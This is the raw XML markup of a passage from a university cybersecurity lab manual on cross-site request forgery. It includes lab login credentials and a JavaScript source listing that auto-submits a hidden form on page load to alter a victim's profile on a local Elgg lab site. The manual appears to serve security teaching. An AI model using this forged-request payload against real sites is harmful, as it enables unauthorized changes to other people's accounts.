          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>User Name: charlie Password: seedcharlie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F67D64" w:rsidRDefault="00F67D64" w:rsidP="0012063A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</w:p>
    <w:p w:rsidR="00DB7F68" w:rsidRDefault="00DB7F68" w:rsidP="0012063A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</w:p>
    <w:p w:rsidR="00DB7F68" w:rsidRDefault="00DB7F68" w:rsidP="0012063A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</w:p>
    <w:p w:rsidR="0098372B" w:rsidRDefault="0098372B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A05CC" w:rsidRPr="00977144" w:rsidRDefault="00A6050C" w:rsidP="001A482F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:after="150"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000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bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Reference</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00084D1F" w:rsidRPr="00084D1F" w:rsidRDefault="00084D1F" w:rsidP="00084D1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:num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084D1F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>http://www.cis.syr.edu/~wedu/seed/lab_env.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00400300" w:rsidRDefault="00400300" w:rsidP="0012063A">
      <w:p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Cs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0012063A" w:rsidRDefault="00A6050C" w:rsidP="00A6050C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:after="150"/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Source C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2063A" w:rsidRPr="00F7135C" w:rsidTr="0012063A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0012063A" w:rsidRPr="00F7135C" w:rsidRDefault="0012063A" w:rsidP="0012063A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F7135C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//index.html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&lt;html&gt;&lt;body&gt;&lt;h1&gt;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This page forges an HTTP POST request.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&lt;/h1&gt;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&lt;script type="text/javascript"&gt;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function post(url,fields)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{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//create a &lt;form&gt; element.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var p = document.createElement("form");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//construct the form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p.action = url;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p.innerHTML = fields;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p.target = "_self";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p.method = "post";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//append the form to the current page.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document.body.appendChild(p);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//submit the form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p.submit();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}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function csrf_hack()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{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var fields;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// The following are form entries that need to be filled out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// by attackers. The entries are made hidden, so the victim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// won’t be able to see them.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fields += "&lt;input type='hidden' name='name' value='Boby'&gt;";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fields += "&lt;input type='hidden' name='description' value='I support SEED project!'&gt;";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fields += "&lt;input type='hidden' name='accesslevel[description]' value='2'&gt;";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fields += "&lt;input type='hidden' name='briefdescription' value='I support SEED project!'&gt;";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fields += "&lt;input type='hidden' name='accesslevel[briefdescription]' value='2'&gt;";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fields += "&lt;input type='hidden' name='location' value='Bowie State University'&gt;";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fields += "&lt;input type='hidden' name='accesslevel[location]' value='2'&gt;";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fields += "&lt;input type='hidden' name='guid' value='40'&gt;";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var url = "http://www.csrflabelgg.com/action/profile/edit";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post(url,fields);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}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// invoke csrf_hack() after the page is loaded.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window.onload = function() { csrf_hack();}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006B0CA5" w:rsidRPr="006B0CA5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&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0012063A" w:rsidRPr="00F7135C" w:rsidRDefault="006B0CA5" w:rsidP="006B0CA5">
            <w:pPr>
              <w:jc w:val="both"/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</w:pPr>
            <w:r w:rsidRPr="006B0CA5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>&lt;/body&gt;&lt;/html&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0012063A" w:rsidRPr="0012063A" w:rsidRDefault="0012063A" w:rsidP="0012063A">
      <w:p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Cs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0012063A" w:rsidRPr="0012063A">
      <w:headerReference w:type="default" r:id="rId27"/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15BB8" w:rsidRDefault="00A15BB8" w:rsidP="00EB2649">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00A15BB8" w:rsidRDefault="00A15BB8" w:rsidP="00EB26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NimbusRomNo9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F5FE8" w:rsidRDefault="00CF5FE8">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:pBdr>
        <w:bottom w:val="double" w:sz="6" w:space="1" w:color="auto"/>
      </w:pBdr>
      <w:rPr>
        <w:rFonts w:ascii="Segoe Print" w:hAnsi="Segoe Print"/>
      </w:rPr>
    </w:pPr>
  </w:p>
  <w:p w:rsidR="00CF5FE8" w:rsidRPr="00AF6EFD" w:rsidRDefault="00CF5FE8">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:rPr>
        <w:rFonts w:ascii="Segoe Print" w:hAnsi="Segoe Print"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00AF6EFD">
      <w:rPr>
        <w:rFonts w:ascii="Segoe Print" w:hAnsi="Segoe Print"/>
      </w:rPr>
      <w:t>Developed By Frank Xu, Ph.D.</w:t>
    </w:r>
    <w:r w:rsidRPr="00AF6EFD">
      <w:rPr>
        <w:rFonts w:ascii="Segoe Print" w:hAnsi="Segoe Print"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r w:rsidRPr="00AF6EFD">
      <w:rPr>
        <w:rFonts w:ascii="Segoe Print" w:hAnsi="Segoe Print"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r w:rsidRPr="00AF6EFD">
      <w:rPr>
        <w:rFonts w:ascii="Segoe Print" w:hAnsi="Segoe Print"/>
        <w:color w:val="7F7F7F" w:themeColor="background1" w:themeShade="7F"/>
        <w:spacing w:val="60"/>
      </w:rPr>
      <w:t>Page</w:t>
    </w:r>
    <w:r w:rsidRPr="00AF6EFD">
      <w:rPr>
        <w:rFonts w:ascii="Segoe Print" w:hAnsi="Segoe Print"/>
      </w:rPr>
      <w:t xml:space="preserve"> | </w:t>
    </w:r>
    <w:r w:rsidRPr="00AF6EFD">
      <w:rPr>
        <w:rFonts w:ascii="Segoe Print" w:hAnsi="Segoe Print"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="00AF6EFD">
      <w:rPr>
        <w:rFonts w:ascii="Segoe Print" w:hAnsi="Segoe Print"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r w:rsidRPr="00AF6EFD">
      <w:rPr>
        <w:rFonts w:ascii="Segoe Print" w:hAnsi="Segoe Print"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="0098372B" w:rsidRPr="0098372B">
      <w:rPr>
        <w:rFonts w:ascii="Segoe Print" w:hAnsi="Segoe Print"/>
        <w:b/>
        <w:bCs/>
        <w:noProof/>
      </w:rPr>
      <w:t>9</w:t>
    </w:r>
    <w:r w:rsidRPr="00AF6EFD">
      <w:rPr>
        <w:rFonts w:ascii="Segoe Print" w:hAnsi="Segoe Print"/>
        <w:b/>
        <w:bCs/>
        <w:noProof/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w:rsidR="00CF5FE8" w:rsidRPr="009C26E5" w:rsidRDefault="00CF5FE8" w:rsidP="00F638F2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15BB8" w:rsidRDefault="00A15BB8" w:rsidP="00EB2649">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00A15BB8" w:rsidRDefault="00A15BB8" w:rsidP="00EB26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F5FE8" w:rsidRPr="0074054E" w:rsidRDefault="00CF5FE8" w:rsidP="00EB2649">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:pBdr>
        <w:bottom w:val="double" w:sz="6" w:space="1" w:color="auto"/>
      </w:pBdr>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:rFonts w:ascii="Segoe Print" w:hAnsi="Segoe Print" w:cs="Arial"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="0074054E">
      <w:rPr>
        <w:rFonts w:ascii="Segoe Print" w:hAnsi="Segoe Print" w:cs="Arial"/>
        <w:b/>
        <w:sz w:val="28"/>
      </w:rPr>
      <w:t xml:space="preserve">Cybersecurity Lab Manual       </w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="00CF5FE8" w:rsidRPr="009C26E5" w:rsidRDefault="00CF5FE8" w:rsidP="009C26E5">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:ind w:right="440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6D50E6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AE8499B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23F3379"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F0FA5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193006"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8CF6543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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="145D7886"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DDBE755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9045889"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6C76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95A41"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CCE02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C3F22"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0C08F8E6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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="217C4502"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5AFCD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21833BA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2B084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52E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25777D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3A088B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C380A35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3DB876C9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9E4C3AE6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15352E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14" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="40E12F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48E36C7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7C30AA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4802E2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="86168792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9758AD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5C8CE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537E86"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="401284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66E2424B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="631229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1B461AA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E924B03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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="71EF3459"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="271A6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7CFD3AE2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="767A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FC7249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num w:numId="1">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="3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M7IwN7e0NDQxNDVQ0lEKTi0uzszPAykwNKoFAJiNlcAtAAAA"/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00615E00"/>
    <w:rsid w:val="00006176"/>
    <w:rsid w:val="000064BF"/>
    <w:rsid w:val="000170C8"/>
    <w:rsid w:val="0002474A"/>
    <w:rsid w:val="00024E6C"/>
    <w:rsid w:val="00030619"/>
    <w:rsid w:val="000339B9"/>
    <w:rsid w:val="00042B97"/>
    <w:rsid w:val="00043880"/>
    <w:rsid w:val="000532E1"/>
    <w:rsid w:val="000548E9"/>
    <w:rsid w:val="000554EA"/>
    <w:rsid w:val="00056774"/>
    <w:rsid w:val="00056F38"/>
    <w:rsid w:val="00057907"/>
    <w:rsid w:val="00083C67"/>
    <w:rsid w:val="00084D1F"/>
    <w:rsid w:val="00085C9D"/>
    <w:rsid w:val="000A1411"/>
    <w:rsid w:val="000A43E0"/>
    <w:rsid w:val="000B2117"/>
    <w:rsid w:val="000D6C16"/>
    <w:rsid w:val="0012063A"/>
    <w:rsid w:val="001417FB"/>
    <w:rsid w:val="00164006"/>
    <w:rsid w:val="00175849"/>
    <w:rsid w:val="0018358E"/>
    <w:rsid w:val="00184EC9"/>
    <w:rsid w:val="00186F68"/>
    <w:rsid w:val="00191435"/>
    <w:rsid w:val="001A1B75"/>
    <w:rsid w:val="001A482F"/>
    <w:rsid w:val="001A71CE"/>
    <w:rsid w:val="001B2911"/>
    <w:rsid w:val="001B4016"/>
    <w:rsid w:val="001B5A5C"/>
    <w:rsid w:val="001C49A7"/>
    <w:rsid w:val="001D5DD3"/>
    <w:rsid w:val="001F0ACD"/>
    <w:rsid w:val="001F46E2"/>
    <w:rsid w:val="0020616F"/>
    <w:rsid w:val="00235293"/>
    <w:rsid w:val="00260EEF"/>
    <w:rsid w:val="002775B7"/>
    <w:rsid w:val="00281A6C"/>
    <w:rsid w:val="002823B1"/>
    <w:rsid w:val="002830CC"/>
    <w:rsid w:val="002852D4"/>
    <w:rsid w:val="002B2DFD"/>
    <w:rsid w:val="002B386C"/>
    <w:rsid w:val="002D7BC1"/>
    <w:rsid w:val="002E0519"/>
    <w:rsid w:val="002E4979"/>
    <w:rsid w:val="002E4B1E"/>
    <w:rsid w:val="002E5842"/>
    <w:rsid w:val="00303E10"/>
    <w:rsid w:val="003059B2"/>
    <w:rsid w:val="00305B42"/>
    <w:rsid w:val="00307B16"/>
    <w:rsid w:val="0031766C"/>
    <w:rsid w:val="0032214A"/>
    <w:rsid w:val="0032426B"/>
    <w:rsid w:val="00353B65"/>
    <w:rsid w:val="00353DFB"/>
    <w:rsid w:val="00385760"/>
    <w:rsid w:val="00390C09"/>
    <w:rsid w:val="003B554D"/>
    <w:rsid w:val="003C1F5E"/>
    <w:rsid w:val="00400300"/>
    <w:rsid w:val="0040558A"/>
    <w:rsid w:val="0040691C"/>
    <w:rsid w:val="00411908"/>
    <w:rsid w:val="004207EE"/>
    <w:rsid w:val="00421F24"/>
    <w:rsid w:val="004235A0"/>
    <w:rsid w:val="00441D34"/>
    <w:rsid w:val="0044590F"/>
    <w:rsid w:val="004558D5"/>
    <w:rsid w:val="004677A2"/>
    <w:rsid w:val="004747E9"/>
    <w:rsid w:val="00475343"/>
    <w:rsid w:val="004779BB"/>
    <w:rsid w:val="00483B53"/>
    <w:rsid w:val="004A2C2C"/>
    <w:rsid w:val="004A6B74"/>
    <w:rsid w:val="004C0928"/>
    <w:rsid w:val="004C22EF"/>
    <w:rsid w:val="004D28A9"/>
    <w:rsid w:val="004D3A6A"/>
    <w:rsid w:val="004E1B28"/>
    <w:rsid w:val="00522429"/>
    <w:rsid w:val="0052425F"/>
    <w:rsid w:val="00526EB6"/>
    <w:rsid w:val="00527399"/>
    <w:rsid w:val="005275B6"/>
    <w:rsid w:val="005405CF"/>
    <w:rsid w:val="0054590D"/>
    <w:rsid w:val="00546F58"/>
    <w:rsid w:val="00552524"/>
    <w:rsid w:val="005613F5"/>
    <w:rsid w:val="00574A55"/>
    <w:rsid w:val="00574EE6"/>
    <w:rsid w:val="005869A2"/>
    <w:rsid w:val="00590654"/>
    <w:rsid w:val="00590ABC"/>
    <w:rsid w:val="00594AD1"/>
    <w:rsid w:val="00594B45"/>
    <w:rsid w:val="0059641C"/>
    <w:rsid w:val="005B5B6F"/>
    <w:rsid w:val="005C3A69"/>
    <w:rsid w:val="005C5377"/>
    <w:rsid w:val="005D4228"/>
    <w:rsid w:val="005E2847"/>
    <w:rsid w:val="0060612B"/>
    <w:rsid w:val="006147ED"/>
    <w:rsid w:val="00615E00"/>
    <w:rsid w:val="00623879"/>
    <w:rsid w:val="00624F95"/>
    <w:rsid w:val="00625802"/>
    <w:rsid w:val="00652256"/>
    <w:rsid w:val="006542B7"/>
    <w:rsid w:val="00666EA1"/>
    <w:rsid w:val="00667B0B"/>
    <w:rsid w:val="00670550"/>
    <w:rsid w:val="00677AA1"/>
    <w:rsid w:val="00696527"/>
    <w:rsid w:val="006965D0"/>
    <w:rsid w:val="006B0CA5"/>
    <w:rsid w:val="006D7A5F"/>
    <w:rsid w:val="006E378F"/>
    <w:rsid w:val="006E72B4"/>
    <w:rsid w:val="007044CE"/>
    <w:rsid w:val="007161A5"/>
    <w:rsid w:val="007404D9"/>
    <w:rsid w:val="0074054E"/>
    <w:rsid w:val="00744954"/>
    <w:rsid w:val="00756082"/>
    <w:rsid w:val="00770985"/>
    <w:rsid w:val="007818F1"/>
    <w:rsid w:val="007946C3"/>
    <w:rsid w:val="007A05CC"/>
    <w:rsid w:val="007A2F34"/>
    <w:rsid w:val="007A5427"/>
    <w:rsid w:val="007D0CBB"/>
    <w:rsid w:val="007D26A9"/>
    <w:rsid w:val="007D293F"/>
    <w:rsid w:val="007D70F8"/>
    <w:rsid w:val="007E216D"/>
    <w:rsid w:val="007E3EC5"/>
    <w:rsid w:val="00800405"/>
    <w:rsid w:val="00804AE0"/>
    <w:rsid w:val="00812B21"/>
    <w:rsid w:val="00817DE5"/>
    <w:rsid w:val="00860F91"/>
    <w:rsid w:val="00863304"/>
    <w:rsid w:val="00865D96"/>
    <w:rsid w:val="00867176"/>
    <w:rsid w:val="00867E8F"/>
    <w:rsid w:val="00874767"/>
    <w:rsid w:val="008C01DA"/>
    <w:rsid w:val="008E20C1"/>
    <w:rsid w:val="008F0B43"/>
    <w:rsid w:val="00900333"/>
    <w:rsid w:val="00913D64"/>
    <w:rsid w:val="00917814"/>
    <w:rsid w:val="0092540D"/>
    <w:rsid w:val="00927275"/>
    <w:rsid w:val="0093132D"/>
    <w:rsid w:val="00946273"/>
    <w:rsid w:val="009465AB"/>
    <w:rsid w:val="00960109"/>
    <w:rsid w:val="0096037F"/>
    <w:rsid w:val="00970B29"/>
    <w:rsid w:val="009801A3"/>
    <w:rsid w:val="0098372B"/>
    <w:rsid w:val="0098557B"/>
    <w:rsid w:val="009860FC"/>
    <w:rsid w:val="00994BD1"/>
    <w:rsid w:val="009A6FED"/>
    <w:rsid w:val="009B0E1F"/>
    <w:rsid w:val="009B491C"/>
    <w:rsid w:val="009B6E9D"/>
    <w:rsid w:val="009C26E5"/>
    <w:rsid w:val="009D1D59"/>
    <w:rsid w:val="009D68CA"/>
    <w:rsid w:val="009D7814"/>
    <w:rsid w:val="009E7C2D"/>
    <w:rsid w:val="009F518B"/>
    <w:rsid w:val="009F626A"/>
    <w:rsid w:val="00A11EA8"/>
    <w:rsid w:val="00A15BB8"/>
    <w:rsid w:val="00A16983"/>
    <w:rsid w:val="00A4033D"/>
    <w:rsid w:val="00A4680C"/>
    <w:rsid w:val="00A5001E"/>
    <w:rsid w:val="00A6050C"/>
    <w:rsid w:val="00A60AC4"/>
    <w:rsid w:val="00A72BF4"/>
    <w:rsid w:val="00A808AA"/>
    <w:rsid w:val="00A809CB"/>
    <w:rsid w:val="00A95921"/>
    <w:rsid w:val="00A96CCD"/>
    <w:rsid w:val="00AB11A6"/>
    <w:rsid w:val="00AB2CE6"/>
    <w:rsid w:val="00AC090D"/>
    <w:rsid w:val="00AC36B9"/>
    <w:rsid w:val="00AC431E"/>
    <w:rsid w:val="00AD2EEC"/>
    <w:rsid w:val="00AD4CE0"/>
    <w:rsid w:val="00AE4EDB"/>
    <w:rsid w:val="00AE61D9"/>
    <w:rsid w:val="00AF12E6"/>
    <w:rsid w:val="00AF6EFD"/>
    <w:rsid w:val="00B0750A"/>
    <w:rsid w:val="00B21540"/>
    <w:rsid w:val="00B25728"/>
    <w:rsid w:val="00B3345D"/>
    <w:rsid w:val="00B372CB"/>
    <w:rsid w:val="00B45B3C"/>
    <w:rsid w:val="00B631B6"/>
    <w:rsid w:val="00B64DC8"/>
    <w:rsid w:val="00B76330"/>
    <w:rsid w:val="00B83AA4"/>
    <w:rsid w:val="00B877EE"/>
    <w:rsid w:val="00B93AA7"/>
    <w:rsid w:val="00BA0F1D"/>
    <w:rsid w:val="00BB5835"/>
    <w:rsid w:val="00BC2DC1"/>
    <w:rsid w:val="00BD2BF6"/>
    <w:rsid w:val="00BD4411"/>
    <w:rsid w:val="00BF282B"/>
    <w:rsid w:val="00BF3017"/>
    <w:rsid w:val="00C115B9"/>
    <w:rsid w:val="00C14E85"/>
    <w:rsid w:val="00C27D10"/>
    <w:rsid w:val="00C30408"/>
    <w:rsid w:val="00C475D6"/>
    <w:rsid w:val="00C75918"/>
    <w:rsid w:val="00CA2904"/>
    <w:rsid w:val="00CB22A5"/>
    <w:rsid w:val="00CD7432"/>
    <w:rsid w:val="00CF2381"/>
    <w:rsid w:val="00CF5123"/>
    <w:rsid w:val="00CF5C20"/>
    <w:rsid w:val="00CF5F58"/>
    <w:rsid w:val="00CF5FE8"/>
    <w:rsid w:val="00D16454"/>
    <w:rsid w:val="00D23C11"/>
    <w:rsid w:val="00D374BC"/>
    <w:rsid w:val="00D37B10"/>
    <w:rsid w:val="00D54C0C"/>
    <w:rsid w:val="00D62F01"/>
    <w:rsid w:val="00D66B24"/>
    <w:rsid w:val="00D80AAC"/>
    <w:rsid w:val="00D812E4"/>
    <w:rsid w:val="00D827DD"/>
    <w:rsid w:val="00D82EAA"/>
    <w:rsid w:val="00D852BD"/>
    <w:rsid w:val="00D87328"/>
    <w:rsid w:val="00DA361E"/>
    <w:rsid w:val="00DB204D"/>
    <w:rsid w:val="00DB7F68"/>
    <w:rsid w:val="00DC2E11"/>
    <w:rsid w:val="00DC57E5"/>
    <w:rsid w:val="00DD757E"/>
    <w:rsid w:val="00E10B3E"/>
    <w:rsid w:val="00E34291"/>
    <w:rsid w:val="00E3780F"/>
    <w:rsid w:val="00E4404F"/>
    <w:rsid w:val="00E45598"/>
    <w:rsid w:val="00E46479"/>
    <w:rsid w:val="00E56F0F"/>
    <w:rsid w:val="00E95143"/>
    <w:rsid w:val="00E956C0"/>
    <w:rsid w:val="00E97980"/>
    <w:rsid w:val="00EA087B"/>
    <w:rsid w:val="00EA597D"/>
    <w:rsid w:val="00EA66CE"/>
    <w:rsid w:val="00EB2649"/>
    <w:rsid w:val="00EB53E8"/>
    <w:rsid w:val="00EC1602"/>
    <w:rsid w:val="00EC30CA"/>
    <w:rsid w:val="00EE30FE"/>
    <w:rsid w:val="00EF096B"/>
    <w:rsid w:val="00EF1B8B"/>
    <w:rsid w:val="00F12F2A"/>
    <w:rsid w:val="00F23703"/>
    <w:rsid w:val="00F32F64"/>
    <w:rsid w:val="00F331E8"/>
    <w:rsid w:val="00F41B76"/>
    <w:rsid w:val="00F638F2"/>
    <w:rsid w:val="00F67D64"/>
    <w:rsid w:val="00F7135C"/>
    <w:rsid w:val="00F76CDE"/>
    <w:rsid w:val="00FA3F13"/>
    <w:rsid w:val="00FA6D87"/>
    <w:rsid w:val="00FC0C19"/>
    <w:rsid w:val="00FC544A"/>
    <w:rsid w:val="00FC5875"/>
    <w:rsid w:val="00FF5A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3BBA7A4-8BC2-42A4-A3D7-09152868A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5E00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E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8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E0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615E00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15E00"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00615E00"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00615E00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7B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680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649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649"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00BF301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B29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804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3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7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4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5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http://www.csrflabattaker/index.html" TargetMode="External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hyperlink" Target="http://www.csrflabelgg.com/" TargetMode="Externa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B893F77-B7C5-45D1-8D4E-22E22FB7CC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5</TotalTime>
  <Pages>9</Pages>
  <Words>812</Words>
  <Characters>463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4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XU</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>FXU</cp:lastModifiedBy>
  <cp:revision>201</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-09-24T02:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-10-26T21:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>